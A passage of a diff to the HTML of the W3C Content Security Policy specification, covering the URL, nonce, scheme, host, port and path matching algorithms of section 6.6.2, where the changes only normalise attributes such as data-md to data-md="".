+       <li data-md="">
         <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑥④">value</a> contains
   "<a data-link-type="grammar" href="#grammardef-strict-dynamic" id="ref-for-grammardef-strict-dynamic②"><code>'strict-dynamic'</code></a>", and <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-parser-metadata" id="ref-for-concept-request-parser-metadata②">parser metadata</a> is not <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted" id="ref-for-parser-inserted②">"parser-inserted"</a>,
   return "<code>Allowed</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑥⑤">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.6.2" id="matching-urls"><span class="secno">6.6.2. </span><span class="content">URL Matching</span><a class="self-link" href="#matching-urls"></a></h4>
@@ -4670,17 +4678,17 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
   algorithm returns the violated <a data-link-type="dfn" href="#directives" id="ref-for-directives③①">directive</a> if the request violates the
   policy, and "<code>Does Not Violate</code>" otherwise.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>violates</var> be "<code>Does Not Violate</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>directive</var> in <var>policy</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>result</var> be the result of executing <var>directive</var>’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①⑨">pre-request check</a> on <var>request</var> and <var>policy</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>result</var> is "<code>Blocked</code>", then let <var>violates</var> be <var>directive</var>.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>violates</var>.</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="Does nonce match source list?" data-level="6.6.2.2" id="match-nonce-to-source-list"><span class="secno">6.6.2.2. </span><span class="content"> Does <var>nonce</var> match <var>source list</var>? </span><a class="self-link" href="#match-nonce-to-source-list"></a></h5>
@@ -4688,18 +4696,18 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
   "<code>Matches</code>" if the nonce matches one or more source expressions in the list,
   and "<code>Does Not Match</code>" otherwise:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>source list</var> is not <code>null</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>nonce</var> is the empty string, return "<code>Does Not Match</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>expression</var> in <var>source list</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var> matches the <a data-link-type="grammar" href="#grammardef-nonce-source" id="ref-for-grammardef-nonce-source④"><code>nonce-source</code></a> grammar,
   and <var>nonce</var> is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive" id="ref-for-case-sensitive②">case-sensitive</a> match for <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value⑤"><code>base64-value</code></a> part, return "<code>Matches</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Does Not Match</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="Does request match source list?" data-level="6.6.2.3" id="match-request-to-source-list"><span class="secno">6.6.2.3. </span><span class="content"> Does <var>request</var> match <var>source list</var>? </span><a class="self-link" href="#match-request-to-source-list"></a></h5>
@@ -4715,25 +4723,25 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
   algorithm returns "<code>Matches</code>" if the URL matches one or more source
   expressions in <var>source list</var>, or "<code>Does Not Match</code>" otherwise:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>source list</var> is not <code>null</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>source list</var> is an empty list, return "<code>Does Not Match</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>source list</var> contains a single item which is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive⑦">ASCII
   case-insensitive</a> match for the string "<code>'none'</code>", return "<code>Does Not Match</code>".</p>
       <p class="note" role="note"><span>Note:</span> An empty source list (that is, a directive without a value: <code>script-src</code>,
   as opposed to <code>script-src host1</code>) is equivalent to a source list containing <code>'none'</code>,
   and will not match any URL.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>expression</var> in <var>source list</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <a href="#match-url-to-source-expression">§6.6.2.6 Does url match expression in origin with redirect count?</a> returns "<code>Matches</code>" when
   executed upon <var>url</var>, <var>expression</var>, <var>origin</var>, and <var>redirect count</var>, return
   "<code>Matches</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Does Not Match</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="Does url match expression in origin with redirect count?" data-level="6.6.2.6" id="match-url-to-source-expression"><span class="secno">6.6.2.6. </span><span class="content"> Does <var>url</var> match <var>expression</var> in <var>origin</var> with <var>redirect count</var>? </span><a class="self-link" href="#match-url-to-source-expression"></a></h5>
@@ -4743,69 +4751,69 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
     <p class="note" role="note"><span>Note:</span> <var>origin</var> is the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin" id="ref-for-concept-origin③">origin</a> of the resource relative to which the <var>expression</var> should be resolved. "<code>'self'</code>", for instance, will have distinct
   meaning depending on that bit of context.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>expression</var> is the string "*", return "<code>Matches</code>" if one or more of
   the following conditions is met:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p><var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme③">scheme</a> is a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#network-scheme" id="ref-for-network-scheme②">network scheme</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p><var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme④">scheme</a> is the same as <var>origin</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin-scheme" id="ref-for-concept-origin-scheme">scheme</a>.</p>
       </ol>
       <p class="note" role="note"><span>Note:</span> This logic means that in order to allow a resource from a non-<a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#network-scheme" id="ref-for-network-scheme③">network scheme</a>,
   it has to be either explicitly specified (e.g. <code>default-src * data: custom-scheme-1: custom-scheme-2:</code>),
   or the protected resource must be loaded from the same scheme.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>expression</var> matches the <a data-link-type="grammar" href="#grammardef-scheme-source" id="ref-for-grammardef-scheme-source②"><code>scheme-source</code></a> or <a data-link-type="grammar" href="#grammardef-host-source" id="ref-for-grammardef-host-source②"><code>host-source</code></a> grammar:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var> has a <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part②"><code>scheme-part</code></a>, and it does not <a data-link-type="dfn" href="#scheme-part-match" id="ref-for-scheme-part-match"><code>scheme-part</code> match</a> <var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme⑤">scheme</a>, return "<code>Does Not Match</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var> matches the <a data-link-type="grammar" href="#grammardef-scheme-source" id="ref-for-grammardef-scheme-source③"><code>scheme-source</code></a> grammar,
   return "<code>Matches</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>expression</var> matches the <a data-link-type="grammar" href="#grammardef-host-source" id="ref-for-grammardef-host-source③"><code>host-source</code></a> grammar:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>url</var>’s <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#dom-url-host" id="ref-for-dom-url-host">host</a></code> is <code>null</code>, return "<code>Does Not Match</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var> does not have a <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part③"><code>scheme-part</code></a>, and <var>origin</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin-scheme" id="ref-for-concept-origin-scheme①">scheme</a> does not <a data-link-type="dfn" href="#scheme-part-match" id="ref-for-scheme-part-match①"><code>scheme-part</code> match</a> <var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme⑥">scheme</a>,
   return "<code>Does Not Match</code>".</p>
         <p class="note" role="note"><span>Note:</span> As with <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part④"><code>scheme-part</code></a> above, we allow schemeless <a data-link-type="grammar" href="#grammardef-host-source" id="ref-for-grammardef-host-source④"><code>host-source</code></a> expressions to be upgraded from insecure
   schemes to secure schemes.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-host-part" id="ref-for-grammardef-host-part①"><code>host-part</code></a> does not <a data-link-type="dfn" href="#host-part-match" id="ref-for-host-part-match"><code>host-part</code> match</a> <var>url</var>’s <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#dom-url-host" id="ref-for-dom-url-host①">host</a></code>, return "<code>Does Not Match</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>port-part</var> be <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-port-part" id="ref-for-grammardef-port-part①"><code>port-part</code></a> if present, and <code>null</code> otherwise.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>port-part</var> does not <a data-link-type="dfn" href="#port-part-matches" id="ref-for-port-part-matches"><code>port-part</code> match</a> <var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-port" id="ref-for-concept-url-port">port</a> and <var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme⑦">scheme</a>, return "<code>Does Not Match</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var> contains a non-empty <a data-link-type="grammar" href="#grammardef-path-part" id="ref-for-grammardef-path-part①"><code>path-part</code></a>, and <var>redirect count</var> is 0, then:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Let <var>path</var> be the resulting of joining <var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-path" id="ref-for-concept-url-path">path</a> on the U+002F SOLIDUS character (<code>/</code>).</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-path-part" id="ref-for-grammardef-path-part②"><code>path-part</code></a> does not <a data-link-type="dfn" href="#path-part-match" id="ref-for-path-part-match"><code>path-part</code> match</a> <var>path</var>,
   return "<code>Does Not Match</code>".</p>
         </ol>
-       <li data-md>
+       <li data-md="">
         <p>Return "<code>Matches</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>expression</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive⑧">ASCII case-insensitive</a> match for "<code>'self'</code>",
   return "<code>Matches</code>" if one or more of the following conditions is met:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p><var>origin</var> is the same as <var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-origin" id="ref-for-concept-url-origin①">origin</a></p>
-       <li data-md>
+       <li data-md="">
         <p><var>origin</var>’s <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#dom-url-host" id="ref-for-dom-url-host②">host</a></code> is the same as <var>url</var>’s <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#dom-url-host" id="ref-for-dom-url-host③">host</a></code>, <var>origin</var>’s <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#dom-url-port" id="ref-for-dom-url-port">port</a></code> and <var>url</var>’s <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#dom-url-port" id="ref-for-dom-url-port①">port</a></code> are either the same
   or the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#default-port" id="ref-for-default-port">default ports</a> for their respective <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme⑧">scheme</a>s, and
   one or more of the following conditions is met:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p><var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme⑨">scheme</a> is "<code>https</code>" or "<code>wss</code>"</p>
-         <li data-md>
+         <li data-md="">
           <p><var>origin</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme①⓪">scheme</a> is "<code>http</code>" and <var>url</var>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme①①">scheme</a> is "<code>http</code>" or "<code>ws</code>"</p>
         </ol>
       </ol>
@@ -4815,35 +4823,35 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
   particular scheme or a port that matches the origin of the protected
   resource, as this seems sufficient to deal with upgrades that can be
   reasonably expected to succeed.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Does Not Match</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="scheme-part matching" data-level="6.6.2.7" id="match-schemes"><span class="secno">6.6.2.7. </span><span class="content"> <code>scheme-part</code> matching </span><a class="self-link" href="#match-schemes"></a></h5>
-    <p>An <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string④">ASCII string</a> <dfn class="dfn-paneled" data-dfn-type="dfn" data-export data-lt="scheme-part match" id="scheme-part-match"><code>scheme-part</code> matches</dfn> another <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string⑤">ASCII string</a> if a CSP source expression that contained the first as a <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part⑥"><code>scheme-part</code></a> could potentially match a URL containing the latter as a <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme①②">scheme</a>. For example, we say that "http" <a data-link-type="dfn" href="#scheme-part-match" id="ref-for-scheme-part-match②"><code>scheme-part</code> matches</a> "https".</p>
+    <p>An <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string④">ASCII string</a> <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" data-lt="scheme-part match" id="scheme-part-match"><code>scheme-part</code> matches</dfn> another <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string⑤">ASCII string</a> if a CSP source expression that contained the first as a <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part⑥"><code>scheme-part</code></a> could potentially match a URL containing the latter as a <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme①②">scheme</a>. For example, we say that "http" <a data-link-type="dfn" href="#scheme-part-match" id="ref-for-scheme-part-match②"><code>scheme-part</code> matches</a> "https".</p>
     <p class="note" role="note"><span>Note:</span> The matching relation is asymmetric. For example, the source expressions <code>https:</code> and <code>https://example.com/</code> do not match the URL <code>http://example.com/</code>. We always allow a
   secure upgrade from an explicitly insecure expression. <code>script-src http:</code> is treated as equivalent
   to <code>script-src http: https:</code>, <code>script-src http://example.com</code> to <code>script-src http://example.com https://example.com</code>, and <code>connect-src ws:</code> to <code>connect-src ws: wss:</code>.</p>
     <p>More formally, two <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string⑥">ASCII strings</a> (<var>A</var> and <var>B</var>) are said to <a data-link-type="dfn" href="#scheme-part-match" id="ref-for-scheme-part-match③"><code>scheme-part</code> match</a> if the
   following algorithm returns "<code>Matches</code>":</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>If one of the following is true, return "<code>Matches</code>":</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p><var>A</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive⑨">ASCII case-insensitive</a> match for <var>B</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p><var>A</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①⓪">ASCII case-insensitive</a> match for "<code>http</code>", and <var>B</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①①">ASCII case-insensitive</a> match for "<code>https</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p><var>A</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①②">ASCII case-insensitive</a> match for "<code>ws</code>", and <var>B</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①③">ASCII case-insensitive</a> match for "<code>wss</code>", "<code>http</code>", or
   "<code>https</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p><var>A</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①④">ASCII case-insensitive</a> match for "<code>wss</code>", and <var>B</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①⑤">ASCII case-insensitive</a> match for "<code>https</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Does Not Match</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="host-part matching" data-level="6.6.2.8" id="match-hosts"><span class="secno">6.6.2.8. </span><span class="content"> <code>host-part</code> matching </span><a class="self-link" href="#match-hosts"></a></h5>
-    <p>An <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string⑦">ASCII string</a> <dfn class="dfn-paneled" data-dfn-type="dfn" data-export data-lt="host-part match" id="host-part-match"><code>host-part</code> matches</dfn> another <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string⑧">ASCII
+    <p>An <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string⑦">ASCII string</a> <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" data-lt="host-part match" id="host-part-match"><code>host-part</code> matches</dfn> another <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string⑧">ASCII
   string</a> if a CSP source expression that contained the first as a <a data-link-type="grammar" href="#grammardef-host-part" id="ref-for-grammardef-host-part②"><code>host-part</code></a> could
   potentially match a URL containing the latter as a <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-host" id="ref-for-concept-url-host">host</a>. For example, we say that
   "www.example.com" <a data-link-type="dfn" href="#host-part-match" id="ref-for-host-part-match①">host-part matches</a> "www.example.com".</p>
@@ -4852,21 +4860,21 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
     <p class="note" role="note"><span>Note:</span> The matching relation is asymmetric. That is, <var>A</var> matching <var>B</var> does not
   mean that <var>B</var> will match <var>A</var>. For example, <code>*.example.com</code> <a data-link-type="dfn" href="#host-part-match" id="ref-for-host-part-match③"><code>host-part</code> matches</a> <code>www.example.com</code>, but <code>www.example.com</code> does not <a data-link-type="dfn" href="#host-part-match" id="ref-for-host-part-match④"><code>host-part</code> match</a> <code>*.example.com</code>.</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>If the first character of <var>A</var> is an U+002A ASTERISK character (<code>*</code>):</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>remaining</var> be the result of removing the leading ("*") from <var>A</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>remaining</var> (including the leading U+002E FULL STOP character
   (<code>.</code>)) is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①⑥">ASCII case-insensitive</a> match for the rightmost
   characters of <var>B</var>, then return "<code>Matches</code>". Otherwise, return
   "<code>Does Not Match</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>A</var> is not an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①⑦">ASCII case-insensitive</a> match for <var>B</var>, return
   "<code>Does Not Match</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>A</var> matches the <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-3.2.2" id="ref-for-section-3.2.2">IPv4address</a> rule from <a data-link-type="biblio" href="#biblio-rfc3986">[RFC3986]</a>, and
   is not "<code>127.0.0.1</code>"; or if <var>A</var> is an <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-ipv6" id="ref-for-concept-ipv6">IPv6 address</a>, return
   "<code>Does Not Match</code>".</p>
@@ -4875,77 +4883,77 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
   security properties of IP addresses in relation to named hosts,
   however, authors are encouraged to prefer the latter whenever
   possible.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Matches</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="port-part matching" data-level="6.6.2.9" id="match-ports"><span class="secno">6.6.2.9. </span><span class="content"> <code>port-part</code> matching </span><a class="self-link" href="#match-ports"></a></h5>
-    <p>An <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①⓪">ASCII string</a> (<var>port A</var>) <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="port-part-matches"><code>port-part</code> matches</dfn> two other <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①①">ASCII
+    <p>An <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①⓪">ASCII string</a> (<var>port A</var>) <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="port-part-matches"><code>port-part</code> matches</dfn> two other <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①①">ASCII
   strings</a> (<var>port B</var> and <var>scheme B</var>) if a CSP source expression that contained the first as a <a data-link-type="grammar" href="#grammardef-port-part" id="ref-for-grammardef-port-part②"><code>port-part</code></a> could potentially match a URL containing the latter as <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-port" id="ref-for-concept-url-port①">port</a> and <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme①③">scheme</a>. For example, "80" <a data-link-type="dfn" href="#port-part-matches" id="ref-for-port-part-matches①"><code>port-part</code> matches</a> matches "80"/"http".</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>If <var>port A</var> is empty:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>port B</var> is the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#default-port" id="ref-for-default-port①">default port</a> for <var>scheme B</var>, return "<code>Matches</code>". Otherwise,
   return "<code>Does Not Match</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>port A</var> is equal to "*", return "<code>Matches</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>port A</var> is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive" id="ref-for-case-sensitive③">case-sensitive</a> match for <var>port B</var>, return "<code>Matches</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>port B</var> is empty:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>port A</var> is the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#default-port" id="ref-for-default-port②">default port</a> for <var>scheme B</var>, return "<code>Matches</code>". Otherwise,
   return "<code>Does not Match</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Does Not Match</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="path-part matching" data-level="6.6.2.10" id="match-paths"><span class="secno">6.6.2.10. </span><span class="content"> <code>path-part</code> matching </span><a class="self-link" href="#match-paths"></a></h5>
-    <p>An <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①②">ASCII string</a> (<var>path A</var>) <dfn class="dfn-paneled" data-dfn-type="dfn" data-export data-lt="path-part match" id="path-part-match"><code>path-part</code> matches</dfn> another <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①③">ASCII string</a> (<var>path B</var>) if a CSP source expression that contained the first as a <a data-link-type="grammar" href="#grammardef-path-part" id="ref-for-grammardef-path-part③"><code>path-part</code></a> could potentially match a URL containing the latter as a <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-path" id="ref-for-concept-url-path①">path</a>.
+    <p>An <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①②">ASCII string</a> (<var>path A</var>) <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" data-lt="path-part match" id="path-part-match"><code>path-part</code> matches</dfn> another <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string①③">ASCII string</a> (<var>path B</var>) if a CSP source expression that contained the first as a <a data-link-type="grammar" href="#grammardef-path-part" id="ref-for-grammardef-path-part③"><code>path-part</code></a> could potentially match a URL containing the latter as a <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-path" id="ref-for-concept-url-path①">path</a>.
   For example, we say that "/subdirectory/" <a data-link-type="dfn" href="#path-part-match" id="ref-for-path-part-match①"><code>path-part</code> matches</a> "/subdirectory/file".</p>
     <p class="note" role="note"><span>Note:</span> The matching relation is asymmetric. That is, <var>path A</var> matching <var>path B</var> does not mean that <var>path B</var> will match <var>path A</var>.</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>If <var>path A</var> is empty, return "<code>Matches</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>path A</var> consists of one character that is equal to the U+002F SOLIDUS
   character (<code>/</code>) and <var>path B</var> is empty, return "<code>Matches</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>exact match</var> be <code>false</code> if the final character of <var>path A</var> is the U+002F
   SOLIDUS character (<code>/</code>), and <code>true</code> otherwise.</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>path list A</var> and <var>path list B</var> be the result of <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#strictly-split" id="ref-for-strictly-split①">strictly splitting</a> <var>path A</var> and <var>path B</var> respectively on the U+002F SOLIDUS character (<code>/</code>).</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>path list A</var> has more items than <var>path list B</var>, return
   "<code>Does Not Match</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>exact match</var> is <code>true</code>, and <var>path list A</var> does not have the same
   number of items as <var>path list B</var>, return "<code>Does Not Match</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>exact match</var> is <code>false</code>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p class="assertion">Assert: the final item in <var>path list A</var> is the empty string.</p>
-       <li data-md>
+       <li data-md="">
         <p>Remove the final item from <var>path list A</var>.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>piece A</var> in <var>path list A</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>piece B</var> be the next item in <var>path list B</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://url.spec.whatwg.org/#percent-decode" id="ref-for-percent-decode">Percent decode</a> <var>piece A</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://url.spec.whatwg.org/#percent-decode" id="ref-for-percent-decode①">Percent decode</a> <var>piece B</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>piece A</var> is not a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive" id="ref-for-case-sensitive④">case-sensitive</a> match
   for <var>piece B</var>, return "<code>Does Not Match</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Matches</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.6.3" id="matching-elements"><span class="secno">6.6.3. </span><span class="content">Element Matching Algorithms</span><a class="self-link" href="#matching-elements"></a></h4>
